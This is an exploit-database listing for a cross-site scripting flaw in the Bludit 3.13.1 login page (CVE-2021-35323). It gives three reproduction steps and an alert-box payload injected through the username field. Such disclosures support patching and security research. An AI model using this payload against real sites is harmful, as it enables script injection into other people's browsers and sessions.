Exploit for Bludit 3.13.1 Cross Site Scripting CVE-2021-35323

Name: Exploit for Bludit 3.13.1 Cross Site Scripting CVE-2021-35323
Rating: 5 (322 reviews)

2021-11-17 | CVSS 4.3

## https://sploitus.com/exploit?id=PACKETSTORM:164990
# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)  
# Date: 19/10/2021  
# Exploit Author: Vasu (tamilan_mkv)  
# Vendor Homepage: https://www.bludit.com  
# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip  
# Version: bludit-3-13-1  
# Tested on: kali linux  
# CVE : CVE-2021-35323  
  
### Steps to reproduce  
  
1. Open login page http://localhost:800/admin/login;  
2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password  
3. Trigger the malicious javascript code